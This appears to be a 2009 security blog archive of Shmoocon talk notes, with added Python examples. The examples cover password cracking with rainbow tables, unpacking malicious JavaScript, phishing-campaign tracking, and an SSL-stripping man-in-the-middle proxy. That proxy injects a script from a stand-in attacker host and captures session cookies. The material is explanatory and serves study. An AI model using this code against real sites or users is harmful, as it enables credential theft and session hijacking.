Archive for February 2009

Social Skills and the Security Professional

Just how important is it for the Security Professional to have social skills?
It seems like a broken record. In addition to having degrees, certifications and experience, we are now supposed to glide seamlessly into the board room and converse equally well about business units and legal briefs. It’s not enough to be technically competent; you’ve got to have a good golf game.
At Shmoocon in the closing plenary an audience member asked for a talk next year on preparing a 30 second security elevator talk. If you’re not familiar with the concept, it is that you have a brief elevator ride with an exec. You have their ear. How do you sell security before the door closes? My VP always asks “are we secure” when I see him. I’ve been told by my Infosec brethren that the answer is yes. Personally I think the answer is “HELL NO, as long as users have local admin rights”. Or perhaps a joke: “you aren’t in handcuffs yet, so we must be doing something right.”
Bill Brenner of CSO online obtained a good quote from the Hoff, Chris Hoff of Unisys and the Rational Security blog.

“The notion that everyone involved in security needs to be able to put themselves out there, get up and give a presentation to the board of directors is ridiculous. We still need skilled operators in the trenches, continuing to do what they do in the basement. Do I want to discourage someone who is fantastic at pen testing by telling them their career will be limited if they can’t put together a PowerPoint presentation for the board?”

Shmoocon 2009 Day 3

Enough with the Insanity: Dictionary Based Rainbow Tables
by Matt Weir
http://reusablesec.googlepages.com/
Defense against offline password cracking
1. salt
2. Make it computationally expensive, e.g. iterate SHA-1 100 times.
Unless of course you salt it wrong:
WPA and WPA2 keys are salted with the SSID, so a table built for a common SSID still covers every network using that name. NTLM uses the username as a salt (strictly, the stored NT hash itself is unsalted; it is the NTLMv2 challenge-response that mixes the username and domain into its HMAC).
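As an added example (not from Matt’s talk or this post), the two defences and the “salted wrong” case modelled in Python. `hash_password` is a toy salted, iterated SHA-1; `wpa_pmk` is the real WPA/WPA2 PMK derivation (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt). The wordlist, user names, SSID and stored hashes are constructed for the demo.

```python
import hashlib
import os

# Constructed wordlist; a real attack would use a much larger one.
WORDLIST = ["password", "letmein", "monkey", "dragon", "shmoocon"]


def hash_password(password, salt=b"", iterations=1):
    """SHA-1 over salt||password, re-hashed `iterations` times.
    Every extra iteration multiplies the attacker's cost per guess by the same factor."""
    digest = hashlib.sha1(salt + password.encode()).digest()
    for _ in range(iterations - 1):
        digest = hashlib.sha1(salt + digest).digest()
    return digest.hex()


def wpa_pmk(passphrase, ssid):
    """Real WPA/WPA2 PMK derivation: PBKDF2-HMAC-SHA1, 4096 rounds, SSID as the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32).hex()


def precompute(wordlist, hash_fn):
    """A lookup table is built once for a fixed hash_fn (and therefore a fixed salt)."""
    return {hash_fn(w): w for w in wordlist}


def crack(table, stored):
    """One dictionary lookup per stored hash; the table's build cost is amortised over all of them."""
    return {who: table[h] for who, h in stored.items() if h in table}


def scenario_unsalted():
    # Two users with the same password produce the same hash; one table serves everyone.
    stored = {"alice": hash_password("password"),
              "bob": hash_password("password"),
              "carol": hash_password("letmein")}
    return crack(precompute(WORDLIST, hash_password), stored)


def scenario_shared_salt(ssid="linksys"):
    # "Salted wrong": the SSID is public and shared, so one table per popular SSID
    # still covers every network, and every client, that uses that name.
    stored = {"ap-home": wpa_pmk("dragon", ssid), "ap-office": wpa_pmk("shmoocon", ssid)}
    table = precompute(WORDLIST, lambda w: wpa_pmk(w, ssid))
    return crack(table, stored)


def scenario_per_user_salt():
    # Random per-user salt plus iterations: a table built for alice's salt is useless
    # against bob, so the attacker starts from scratch for every account.
    salts = {"alice": os.urandom(16), "bob": os.urandom(16)}
    stored = {u: hash_password("password", salts[u], iterations=100) for u in salts}
    table_for_alice = precompute(WORDLIST, lambda w: hash_password(w, salts["alice"], 100))
    return crack(table_for_alice, stored)


if __name__ == "__main__":
    print("unsalted:     ", scenario_unsalted())
    print("shared salt:  ", scenario_shared_salt())
    print("per-user salt:", scenario_per_user_salt())
```

The per-SSID case is why WPA tables for the top few hundred SSIDs were worth building: the salt is on the beacon frame, and it is the same for every client and every network with that name.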
The Problems with Rainbow Tables

  • Probabilistic in nature
  • Long creation time
  • Two hashes take twice as long to crack as one (each lookup is done per hash and nothing is shared between targets, unlike a brute-force run that checks every candidate against all hashes at once)
  • Collisions result in a lot of wasted work

Traditional Rainbow Tables have been brute force attacks. However as Lanman hashes are increasingly disabled, and some organizations have implemented long password requirements (14 characters and up) we need to look at other methods. I’ve found NTLM Rainbow Tables to be massive. In my experience, any organization that has a strong password requirement can’t use NTLM Rainbow Tables. Last time I looked there wasn’t a Rainbow Table with length up to 8 and UPPERS, lowers and numbers. It would be too big.
So what do you do? Over at freerainbowtables.com you can download hybrid rainbow tables. From what I see it’s only really for short passwords. I thought Matt said they had a version of rcrack to generate your own hybrid rainbow table. That would be pretty cool.
I currently do this through brute force looking for the following mask:
Aaaa11122, where
A = upper case. So in this case the first character is an upper case letter.
a = lower case. Characters 2, 3 and 4 are lower case letters.
1 = lower case or numbers. Positions 5, 6 and 7 are lower case letters or numbers.
2 = lower case, numbers or !. Positions 8 and 9 are drawn from that set.
I suspect a rainbow table looking at length 8 or 9 with that combination would save me time in the long run.
Matt has developed a dictionary-based rainbow table generator, available at the URL at the top of this entry. It can take a dictionary and apply common word mangling rules to create rainbow tables. You can also check for common keyboard combos and doubled passwords; people often double their current password to meet lengthy password requirements.
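An added worked example, written for this post rather than taken from Matt’s generator, of what separates a brute-force rainbow table from a dictionary-based one: the only thing that changes is the keyspace the reduction function maps hashes back into. The mask symbols follow the Aaaa11122 scheme above; the word list, the five mangling rules, the chain lengths and MD5 as the target hash are assumptions for the demo, not Matt’s rule set.

```python
import hashlib

# Mask symbols as used in this post: A = upper, a = lower, 1 = lower+digit, 2 = lower+digit+"!"
CHARSETS = {
    "A": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "a": "abcdefghijklmnopqrstuvwxyz",
    "1": "abcdefghijklmnopqrstuvwxyz0123456789",
    "2": "abcdefghijklmnopqrstuvwxyz0123456789!",
}


class MaskKeyspace:
    """Brute-force keyspace for a mask; index -> candidate by mixed-radix decoding."""
    def __init__(self, mask):
        self.sets = [CHARSETS[c] for c in mask]
        self.size = 1
        for s in self.sets:
            self.size *= len(s)

    def __len__(self):
        return self.size

    def __getitem__(self, idx):
        chars = []
        for s in reversed(self.sets):
            idx, r = divmod(idx, len(s))
            chars.append(s[r])
        return "".join(reversed(chars))


class DictRuleKeyspace:
    """Dictionary keyspace: one candidate per (word, mangling rule). Hypothetical rule set."""
    RULES = [
        lambda w: w,
        lambda w: w.capitalize(),
        lambda w: w + w,                   # doubled password
        lambda w: w.capitalize() + "1",
        lambda w: w + "!",
    ]

    def __init__(self, words):
        self.words = list(words)

    def __len__(self):
        return len(self.words) * len(self.RULES)

    def __getitem__(self, idx):
        w, r = divmod(idx, len(self.RULES))
        return self.RULES[r](self.words[w])


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def reduce_to(keyspace, digest_hex, column):
    """Reduction R_column: map a hash back into the keyspace. Column-dependent so that
    two chains only merge if they collide in the same column."""
    return keyspace[(int(digest_hex[:12], 16) + column) % len(keyspace)]


class RainbowTable:
    def __init__(self, keyspace, chain_len, start_indices):
        self.keyspace, self.chain_len = keyspace, chain_len
        self.chains = {}  # end -> [start, ...]; several starts per end = merged chains (wasted work)
        for idx in start_indices:
            start = x = keyspace[idx]
            for col in range(chain_len):
                x = reduce_to(keyspace, md5hex(x), col)
            self.chains.setdefault(x, []).append(start)

    def lookup(self, target_hex):
        """The cost here is paid per target hash: nothing is shared between two lookups."""
        ks, t = self.keyspace, self.chain_len
        for col in range(t - 1, -1, -1):              # assume the target sits in column `col`
            x = reduce_to(ks, target_hex, col)
            for j in range(col + 1, t):
                x = reduce_to(ks, md5hex(x), j)
            for start in self.chains.get(x, []):       # candidate chains; may be false alarms
                y = start
                for k in range(t):
                    if md5hex(y) == target_hex:
                        return y
                    y = reduce_to(ks, md5hex(y), k)
        return None


def coverage(table):
    """Fraction of the keyspace the table actually recovers: tables are probabilistic."""
    ks = table.keyspace
    hits = sum(table.lookup(md5hex(ks[i])) is not None for i in range(len(ks)))
    return hits / len(ks)


if __name__ == "__main__":
    words = ["password", "letmein", "shmoo", "monkey", "dragon"]
    dict_table = RainbowTable(DictRuleKeyspace(words), chain_len=4, start_indices=range(0, 25, 3))
    print("dictionary-table coverage:", coverage(dict_table))
    print("Aaaa11122 keyspace size:", len(MaskKeyspace("Aaaa11122")))   # ~2.9e13 candidates
    small = RainbowTable(MaskKeyspace("Aa1"), chain_len=8, start_indices=range(0, 26 * 26 * 36, 40))
    print("recovered from mask table:", small.lookup(md5hex("Aaa")))
```

The mask keyspace makes the size problem concrete: the nine-character mask above has about 2.9e13 candidates, while a dictionary of a few thousand words times a few dozen rules is a few hundred thousand, which is why a table over the latter is buildable and one over the former is not.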
I currently use InsidePro’s Extreme GPU Bruteforcer (it’s much cheaper than Elcomsoft). The software is cheap and an NVIDIA GeForce 8800 GT is relatively cheap as well. While watching this talk I was wondering about GPU bruteforcing versus rainbow tables. If I can do a hybrid rainbow table, is it then possible to write software to do a hybrid attack using the GPU? Or does the way a GPU works make that a bad idea?
JSunpack
By Blake Hartstein
JSunpack is a JavaScript unpacker available online at jsunpack.jeet.org. It may be available as a download to run locally at some point.
The Problem:
There is a large volume of malicious JavaScript, and these encoded/encrypted JavaScript exploits are difficult to analyze.
In the past you would have to decode it manually: download it, try to modify it to be ‘safe’, and then run it. This is dangerous and requires a sacrificial lamb (a throwaway machine).
To defeat manual analysis the malware creator uses escape sequences, encryption keyed on page tags (so if you change a tag it won’t decrypt), browser environment values as an encryption key, version detection, timing, and blacklisting. Additionally, exploit kits can set their website to serve the malware only once per IP.
After the manual methods, more automated tools followed, such as JSDecode by Dave Zimmer, the Ultimate Deobfuscator by Stephen Chenette of Websense, and Malzilla.
JS Unpack has the following goals

  • Safety – not requiring a sacrificial lamb
  • Archive content
  • Simulate the Browser and plugins (pdf and flash)
  • Combine the best hooking techniques
  • Enable analysis despite IP blocking
  • Integrate with IDS, crawling and other research

ClamAV is used to statically unpack executables.
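An added example, not JSunpack’s code, of why the manual/static approach runs out of road: a small Python peeler that strips the two most common wrapper layers (eval(unescape(...)) and eval(String.fromCharCode(...))) and reports when it reaches a layer whose key comes from the browser environment, which is exactly the case that needs a simulated browser. The samples are constructed and benign: the “payload” is a document.write of an iframe pointing at a hypothetical host, and `decrypt` in the keyed sample is a placeholder name.

```python
import re
from urllib.parse import unquote

STRING_VAR = re.compile(r"""var\s+(\w+)\s*=\s*(["'])(.*?)\2\s*;""", re.S)
EVAL_UNESCAPE = re.compile(r"eval\(\s*unescape\(\s*(\w+|\"[^\"]*\"|'[^']*')\s*\)\s*\)")
EVAL_FROMCHARCODE = re.compile(r"eval\(\s*String\.fromCharCode\(\s*([\d,\s]+)\)\s*\)")
ENVIRONMENT = re.compile(r"document\.location|location\.href|navigator\.userAgent|document\.cookie")


def js_unescape(s):
    """JavaScript unescape(): %uXXXX and %XX, byte-for-byte, no UTF-8 decoding."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def decode_once(script):
    """Strip one wrapper layer; returns (inner_script, None) or (None, reason)."""
    literals = {name: value for name, _, value in STRING_VAR.findall(script)}
    m = EVAL_UNESCAPE.search(script)
    if m:
        arg = m.group(1)
        value = arg[1:-1] if arg[0] in "\"'" else literals.get(arg)
        if value is None:
            return None, "argument is not a string literal we can resolve"
        return js_unescape(value), None
    m = EVAL_FROMCHARCODE.search(script)
    if m:
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), None
    if ENVIRONMENT.search(script):
        return None, "decryption key or branch depends on the browser environment"
    return None, "no recognised wrapper"


def peel(script, max_layers=10):
    """Peel layers until no eval() remains or static decoding gets stuck."""
    layers = [script]
    for _ in range(max_layers):
        current = layers[-1]
        if "eval(" not in current:
            return {"layers": layers, "status": "decoded"}
        inner, reason = decode_once(current)
        if inner is None:
            status = "needs_environment" if "environment" in reason else "stuck"
            return {"layers": layers, "status": status, "reason": reason}
        layers.append(inner)
    return {"layers": layers, "status": "stuck", "reason": "layer limit reached"}


# Constructed, benign sample in the style the talk describes: the real payload (an invisible
# iframe to a hypothetical landing page) is wrapped in fromCharCode and then %-escaped.
FINAL = 'document.write("<iframe src=\\"http://example.invalid/landing\\" width=0 height=0></iframe>");'
LAYER2 = "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in FINAL) + "));"
SAMPLE = 'var s="' + "".join("%%%02x" % ord(c) for c in LAYER2) + '"; eval(unescape(s));'
# Same idea, but the key is the page URL: static peeling cannot go further without a browser.
KEYED_SAMPLE = 'var blob="3a1f9c"; var k=document.location.href; eval(decrypt(blob, k));'

if __name__ == "__main__":
    for name, sample in (("escaped", SAMPLE), ("keyed", KEYED_SAMPLE)):
        result = peel(sample)
        print(name, result["status"], "->", result["layers"][-1][:60])
```

Each regex here is a specific pattern an attacker can trivially vary; JSunpack’s answer is to stop pattern-matching and hook eval, document.write and friends inside a simulated browser so the script decodes itself.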
Plenary Session: Tough Security for Tough Times
This is mostly random notes from the session:
Security spending is holding steady due to compliance requirements and increasing threats.
The half life of security knowledge is 18 months.
This came up in a discussion of security degrees. Engineering constants don’t change, but a security degree could very quickly come to look as useful as a diploma from the punch card era.
DLP is seen as taking off by one analyst. (I guess when everything is DLP, it must get a lot of sales)
Management needs to understand that security isn’t overhead.
The bad guys have learned to stay below the radar. Business will ignore it as long as a threshold isn’t exceeded.
How do you grow security talent that can relate to business?

Shmoocon 2009 Day 2

I really shouldn’t have to wake up at 7:30 am on a Saturday and take the Metro into DC. Fortunately I thought the 10am talk was worth it.
Phishing Statistics and Intuitive Enumeration of Hosts and Roles
by Sean Palka
This talk is about a tool he created and uses in corporate engagements. But as with most things developed on company time, it isn’t free to be released; the presentation is meant to give you ideas. And it does make me realize that this could be a fun side project if I can’t get money for PhishMe and I can’t get hold of Lunker.
The motivation for this tool is to justify to clients that phishing is a useful exercise. He also wanted the tool to gather reliable stats for reporting.
When phishing a company you may find that distribution lists are hit, or that email is forwarded from one user to another. Just as in a marketing campaign, web bugs, images and unique identifiers in URLs are used to determine who follows a link. Most mail clients no longer load images by default, which cuts down on the ability to tell that a message was read but the link was not clicked. However, some companies whitelist their own domain name, allowing images to load automatically.
A bad guy phishing doesn’t care who responds; he just wants the credentials. But whitehat phishing needs reports and attribution. You want to know who visited the site without providing the phished-for information, because your phishing site could just as easily have contained a browser exploit.
Tagging or using unique identifiers in URLs does not solve the problem of message forwarding, or of a single user logging in from multiple locations. Timing can suggest the person probably didn’t drive home in between, but that person could have used remote desktop. You just don’t know whether the message was forwarded or the user went from computer to computer trying the URL.
An audience member pointed out that you could use images and the client cache to determine if the same computer visits more than once. (I’m not sure how that would work if a proxy is used).
You may be able to identify “important” systems from the responses as well. If one computer has a higher than normal number of responses, it might be a helpdesk or an admin checking on user reports. Obviously, if NAT is involved, you need to do your phishing from inside.
Additionally you can determine social networks by seeing to whom the email is forwarded.
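An added example (not Sean’s tool, which isn’t public) of the tracking and attribution mechanics described above: per-recipient HMAC tokens embedded in a web bug and a link, and an analyzer that walks web-server log lines to assign each recipient a stage (opened, clicked, submitted), flags tokens seen from more than one source address, and picks out addresses that touched many different tokens. Host names, addresses, recipients, the campaign key and the log lines are all constructed.

```python
import hashlib
import hmac
import re
from collections import defaultdict

# Constructed campaign secret and hypothetical phishing host.
CAMPAIGN_KEY = b"constructed-campaign-key-generate-a-fresh-one"
BASE_URL = "https://portal-update.example.invalid"
STAGES = ["opened", "clicked", "submitted"]


def make_token(recipient, key=CAMPAIGN_KEY):
    """Per-recipient identifier. An HMAC rather than a sequential id means a curious
    user cannot guess a colleague's token and pollute the stats by visiting it."""
    return hmac.new(key, recipient.lower().encode(), hashlib.sha256).hexdigest()[:16]


def build_campaign(recipients):
    """Return {token: recipient} and, per recipient, the web bug and link to embed."""
    tokens = {make_token(r): r for r in recipients}
    mails = {r: {"bug": f"{BASE_URL}/i/{t}.gif", "link": f"{BASE_URL}/login?t={t}"}
             for t, r in tokens.items()}
    return tokens, mails


LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TOKEN_IN_QUERY = re.compile(r"[?&]t=([0-9a-f]{16})")


def classify(method, path):
    """Map a request to (stage, token): image load = opened, GET = clicked, POST = submitted."""
    if path.startswith("/i/") and path.endswith(".gif"):
        return "opened", path[len("/i/"):-len(".gif")]
    m = TOKEN_IN_QUERY.search(path)
    if m and path.startswith("/login"):
        return ("submitted" if method == "POST" else "clicked"), m.group(1)
    return None, None


def analyze(log_lines, tokens):
    per_user = {r: {"stage": None, "ips": set()} for r in tokens.values()}
    tokens_per_ip = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        stage, token = classify(m["method"], m["path"])
        if stage is None or token not in tokens:       # unknown token: a scanner, not a target
            continue
        rec = per_user[tokens[token]]
        rec["ips"].add(m["ip"])
        if rec["stage"] is None or STAGES.index(stage) > STAGES.index(rec["stage"]):
            rec["stage"] = stage
        tokens_per_ip[m["ip"]].add(token)
    report = {r: {"stage": v["stage"], "ips": sorted(v["ips"]),
                  # One token from several sources: forwarded mail, a second workstation,
                  # remote desktop, or a helpdesk checking the link. The log alone cannot say which.
                  "multi_host": len(v["ips"]) > 1}
              for r, v in per_user.items()}
    helpdesk = sorted(ip for ip, ts in tokens_per_ip.items() if len(ts) >= 3)
    return report, helpdesk


RECIPIENTS = ["alice@corp.example", "bob@corp.example", "carol@corp.example", "dave@corp.example"]


def demo():
    """Run the analysis over a constructed web-server log (combined log format, trimmed)."""
    tokens, _mails = build_campaign(RECIPIENTS)
    a, b, c = (make_token(r) for r in RECIPIENTS[:3])
    log = [
        f'10.1.2.3 - - [08/Feb/2009:10:15:01 -0500] "GET /i/{a}.gif HTTP/1.1" 200 43',
        f'10.1.2.3 - - [08/Feb/2009:10:15:40 -0500] "GET /login?t={a} HTTP/1.1" 200 1024',
        f'10.1.2.3 - - [08/Feb/2009:10:16:05 -0500] "POST /login?t={a} HTTP/1.1" 302 0',
        f'10.1.2.9 - - [08/Feb/2009:10:20:11 -0500] "GET /login?t={b} HTTP/1.1" 200 1024',
        f'10.1.7.7 - - [08/Feb/2009:11:02:33 -0500] "GET /login?t={b} HTTP/1.1" 200 1024',
        f'10.1.9.9 - - [08/Feb/2009:11:30:00 -0500] "GET /login?t={a} HTTP/1.1" 200 1024',
        f'10.1.9.9 - - [08/Feb/2009:11:30:05 -0500] "GET /login?t={b} HTTP/1.1" 200 1024',
        f'10.1.9.9 - - [08/Feb/2009:11:30:09 -0500] "GET /login?t={c} HTTP/1.1" 200 1024',
        '203.0.113.5 - - [08/Feb/2009:12:00:00 -0500] "GET /login?t=0123456789abcdef HTTP/1.1" 404 0',
    ]
    return analyze(log, tokens)


if __name__ == "__main__":
    report, helpdesk = demo()
    for who, row in report.items():
        print(who, row)
    print("addresses touching many tokens (helpdesk/admin?):", helpdesk)
```

In the constructed log, 10.1.9.9 visits three different people’s links within seconds; that is the helpdesk-or-admin signature, and it is also why alice shows up as multi_host even though only one person clicked her link.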
When an internal system is used for a phishing attack, the pros and cons are:
- The firewall prevents external connections: email may be forwarded externally, and responses from outside cannot reach your internal site.
- People may trust the internal IP and act differently.
- You don’t have to worry about your other security filtering getting in the way. This isn’t a test of your spam filter.
- You can build focused attacks on victims.
Whitehat phishing attacks where the website is external have little ability to get the client IP; he said he hasn’t had a lot of consistent success using PHP. This limits reporting capabilities when NAT is used.
I didn’t ask if he did customization to use the users names in the target emails.
He doesn’t include training in the tools (as Phishme does) because the focus of his tool is pentesting not security training. While this is understandable given his role at BAH, I think most people looking to do whitehat phishing are going to want to provide the immediate user feedback/training that has been proven to be effective.
Stranger in a Strange Land: Reflections on a Linux guy’s First Year at Microsoft
by Crispin Cowan
A lot of the talk, I felt I’d seen in either the SDL blog or from Jeff Jones’ blog. Basically slides pointing out the success of the Security Development Lifecycle at Microsoft. Security at Microsoft comes down to before the 2002 Bill Gates Memo and after. For those who don’t know, Microsoft shut down coding for a month and re-trained employees in secure coding practices. They then followed up and made sure people did it.
One of the big problems that isn’t going away is legacy. There are a lot of applications that rely on doing dangerous, stupid things they have been allowed to do for years, and there is only so much breakage you can inflict before people push back. (Side comment: it was a huge deal for Microsoft to disable IIS by default in a desktop operating system; their application vendors expected it to be there.) It is hard to fix architectural issues without breaking old applications, and the application base is the value in Windows.
Another big problem is the massive dependence on local admin. UAC is the stick used to push vendors to write applications that don’t require local admin rights. It’s not UAC that sucks, it’s the crappy application that needs admin rights just to run.
88% of users participating in the feedback program leave UAC enabled.
Another metric they use is sessions that are UAC prompt free.
In Vista RTM, this was 50%.
With SP1, consumer desktops were at 65% and computers joined to a domain (work computers) was at 80%.
I assume this means the applications are getting improved to not need admin rights. It could mean people stopped using the crappy app.
Middling Everything with Middler
by Jay Beale
Obviously MITM is nothing new. What this project does is

  1. Inject javascript into HTTP
  2. Store session ID
  3. Intercept logout requests (even if you think you’ve logged out, you haven’t)
  4. Replace https links with http links (a bank site that only uses https for the login page now takes your login in clear text)

The purpose of the tool is:

  • Inject javascript into every page
  • inject temp or permanent redirects
  • Take over website with Browser exploitation framework
  • Compromise user with metasploit

Middler is available on the InGuardians website.
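An added illustration, not Middler’s source, of the four behaviours listed above, reduced to pure functions over already-parsed requests and responses so it can be exercised without any network code. The attacker host, bank host and cookie values are constructed.

```python
import re
from urllib.parse import urlsplit

# Hypothetical attacker-controlled script; the victim's browser loads it over plain HTTP.
HOOK = '<script src="http://attacker.invalid/hook.js"></script>'
HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")


class StripAndInject:
    """Sits between victim and server. The victim only ever sees http; the upstream
    leg to the real server is still https for any URL we downgraded."""

    def __init__(self):
        self.stripped = set()    # (host, path) pairs the victim now believes are http
        self.sessions = {}       # host -> last Cookie header seen from the victim

    def _downgrade(self, url):
        parts = urlsplit(url)
        self.stripped.add((parts.netloc, parts.path or "/"))
        return "http://" + url[len("https://"):]

    def on_response(self, host, status, headers, body):
        body = HTTPS_URL.sub(lambda m: self._downgrade(m.group(0)), body)   # 4. https -> http links
        if "</body>" in body:                                               # 1. inject JavaScript
            body = body.replace("</body>", HOOK + "</body>", 1)
        else:
            body += HOOK
        out = []
        for name, value in headers:
            if name.lower() == "location" and value.startswith("https://"):
                value = self._downgrade(value)                              # redirects too
            if name.lower() == "set-cookie":
                # A Secure cookie would never be sent over our http leg, so strip the flag.
                value = re.sub(r";\s*secure\b", "", value, flags=re.I)
            out.append((name, value))
        return status, out, body

    def on_request(self, host, path, headers):
        if "Cookie" in headers:
            self.sessions[host] = headers["Cookie"]                         # 2. store session
        bare_path = path.split("?")[0]
        if bare_path.rstrip("/").endswith("/logout"):                       # 3. swallow logout
            return {"intercepted": True,
                    "response": (200, [("Content-Type", "text/html")],
                                 "<html><body>You have been logged out.</body></html>")}
        scheme = "https" if (host, bare_path) in self.stripped else "http"
        return {"intercepted": False, "upstream": f"{scheme}://{host}{path}"}


if __name__ == "__main__":
    mitm = StripAndInject()
    page = '<html><body><a href="https://bank.example/login">Log in</a></body></html>'
    print(mitm.on_response("bank.example", 200,
                           [("Set-Cookie", "sid=abc123; Secure; HttpOnly")], page))
    print(mitm.on_request("bank.example", "/login", {"Cookie": "sid=abc123"}))
    print(mitm.on_request("bank.example", "/logout", {"Cookie": "sid=abc123"}))
    print("captured:", mitm.sessions)
```

Note that the rewriter has to strip the Secure flag for the captured session to be usable over its http leg; cookies that keep that flag, and later HTTP Strict Transport Security with browser preload lists, are what make this class of attack fail.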
The Agreement
A group of friends set up a framework of rules to govern their attempts to 0wn each other’s computers. When no one else will set up a capture the flag exercise for you, you hack on each other.
http://www.jointheagreement.com/
The Fast-Track Suite
by David Kennedy
The Fast-Track suite will be available in BackTrack 4, or check out the Fast-Track website.
All I seem to remember is “pop a box.” ;)
Very interesting point and click hacking. As I understand it, some Metasploit attacks were only available for old specific service packs, he has made the attacks more universal.
In pen testing, I believe people use the Windows debug.exe utility to turn an uploaded hex dump back into a binary, which has a built-in 64 KB limit. He automates a way around that by supplying a new debug utility (at least that is how I understood it).
In the demos he’d run an exploit upload vnc server and connect to it.
I didn’t get a chair during this talk so I dont have a lot of notes.

Shmoocon 2009 Day 1

The next three posts will contain my notes from Shmoocon. This post contains notes from each session I attended on day 1. I’m not trying to necessarily reconstruct the notes into a coherent thought. Hopefully it will be somewhat readable.
Opening Remarks
by Bruce Potter
People are getting owned a lot.
Trends

  • Increased success in getting past our defenses
  • Increasingly malicious motivations. The bad guys aren’t after web defacements
  • In spite of the above, we haven’t changed our methods. It’s a lot of the same.
  • Spear phishing and drive-bys are unabated.

What we have is a Maginot line…in depth
Of 66 million websites indexed by Google, 5 percent had drivebys.
These sites with drivebys weren’t just the risky underbelly of the web. It was every category of website. I don’t think that is surprising to anyone who has paid attention to security.
These findings were published last year at USENIX.
The malicious content on these sites was then scanned using three top antivirus vendors. The best detection rate among the three was only 75%; the worst was 30%. These are untargeted attacks. Imagine how well an attack targeted at your organization would cut through your antivirus defenses.
So What do you do?
NAC? Most people don’t have that deployed even if they’ve bought it.
Firewall Internally?
Token authentication?
Change jobs?
Digging ourselves out
As with most security talks and papers I felt like a solution wasn’t really there. Fixing fundamental problems. I’m not sure if Bruce defined this. If he means teach everyone to code securely, then burn to the ground existing software and start over. Well, keep waiting for that.

The other talks on day one were quick 25-minute talks, and I didn’t always take notes.
Open Vulture – Scavenging the Friendly Skies
Open Source UAV Platform
Ethan O’Toole and Matt David
I didn’t take a lot of notes on this one. The talk was put together fine. It pointed out the existing/competing projects and how they were different.
Building the 2008/2009 ShmooBall Launchers
by Larry Pesce and David Lauer
When building a pressure based launcher, you’ll have problems with PVC tubing not being rated for the PSI.
The Day Spam Stopped (The Srizbi Botnet Takedown)
by Julia Wolf
We all know about McColo being taken offline in November and the corresponding drop in spam rates.
The bad guys lost command and control of the botnet when McColo was taken down. The good guys figured out how the bots selected the fallback hostnames/domain names they would try next (the exact math is probably at blog.fireeye.com, or look for the slides when they go up on the Shmoocon website). By registering those domain names first, they prevented the bad guys from regaining control.
Under U.S. law they felt they could not send an “uninstall” command to the botnet. It would also be risky: the bot runs in the kernel, so a bad uninstall could BSOD the clients.
No one asked about the return of spam reported in January. Is that other botnets taking up the slack? I thought I had heard that a Spanish ISP briefly brought the bad guys’ ASN back online, allowing them to regain control.
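An added example of the race the takedown turned into, with a hypothetical date-seeded domain generator standing in for Srizbi’s real algorithm (which this post defers to the FireEye blog): once the defender knows the algorithm they can enumerate and register everything the bots will try within a window, but the operator only needs one unregistered name, on one day, past the end of that window. Seed, TLD list, dates and the 30-day window are constructed.

```python
import hashlib
from datetime import date, timedelta

SEED = b"constructed-seed-not-the-real-one"
TLDS = ["com", "net", "org"]


def fallback_domains(day, count=4, seed=SEED):
    """Hypothetical date-seeded generator: every bot computes the same candidates for a
    given day and tries them in order, so whoever registered the first one wins that day."""
    names = []
    for i in range(count):
        h = hashlib.sha256(seed + day.isoformat().encode() + bytes([i])).hexdigest()
        label = "".join(chr(ord("a") + int(h[2 * j:2 * j + 2], 16) % 26) for j in range(8))
        names.append(f"{label}.{TLDS[int(h[-2:], 16) % len(TLDS)]}")
    return names


def preregister(start, horizon_days, seed=SEED):
    """Defender who has recovered the algorithm: everything the bots will try in the window."""
    names = []
    for offset in range(horizon_days):
        names.extend(fallback_domains(start + timedelta(days=offset), seed=seed))
    return names


def who_controls(day, registered_by, seed=SEED):
    """Owner of the first candidate that resolves on `day`; None if nobody registered any."""
    for name in fallback_domains(day, seed=seed):
        if name in registered_by:
            return registered_by[name]
    return None


def simulate(start=date(2008, 11, 12), horizon_days=30):
    """Constructed timeline: the defender registers a 30-day window; the operator registers
    the first candidate for the day after it. Returns who the bots reach on each of two days."""
    registered_by = {n: "defender" for n in preregister(start, horizon_days)}
    after_window = start + timedelta(days=horizon_days)
    registered_by[fallback_domains(after_window)[0]] = "operator"
    return (who_controls(start + timedelta(days=5), registered_by),
            who_controls(after_window, registered_by))


if __name__ == "__main__":
    print(fallback_domains(date(2009, 2, 8)))
    print("day 5 / day 30:", simulate())
```

The defender’s position is only as good as the horizon they keep registering ahead of, which is one reading of the January return the post wonders about.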
Automated Mapping of Large Binary Objects
by Greg Conti, Ben Sangster, and Roy Ragsdale.
The goal of this project is to accurately identify regions in an arbitrary binary object.
Typically you would use a hex editor and a lot of elbow grease. This is trying to automate that, even to the point of identifying one type of encryption versus another.
I found the talk interesting. When you’re doing manual static analysis of files, this could come in handy.
Decoding the Smartkey
by Shane Lawson
Kwikset SmartKey attempts to allow the consumer to rekey their lock without removing it from the door. It is also resistant to bump keying. Kwikset has a video showing how to rekey.
Unfortunately, as this talk demonstrates, the mechanism that allows rekeying also makes it possible to determine the key cut heights, compromising the lock.

SANS Newsbites on Phishing your Company

SANS Newsbites is a summary of the most important news articles published on computer security in the past week. It includes commentary from an editorial board.
In Volume 11 Number 9, they reported on the DOJ self-phishing exercises that have been in the news. I was a little surprised that Marcus Ranum wrote “This sort of test generally serves only to embarrass people and hasn’t been shown to have any useful long-term effect. When I see someone trying this kind of stuff, I think it’s just a case of some auditor or pen-tester trying to prove their worth by having something about which they can scream ‘GOTCHA!’”
It is true that phishing does have a great chance of success for pentesters. But I’ve seen numbers from phishme.com showing a marked improvement from initial tests to followup tests. That is what Alan Paller said in reply to Ranum in the Newsbites as well.
I agree with what Paller wrote: phishing your own company is a core component of increasing security awareness.
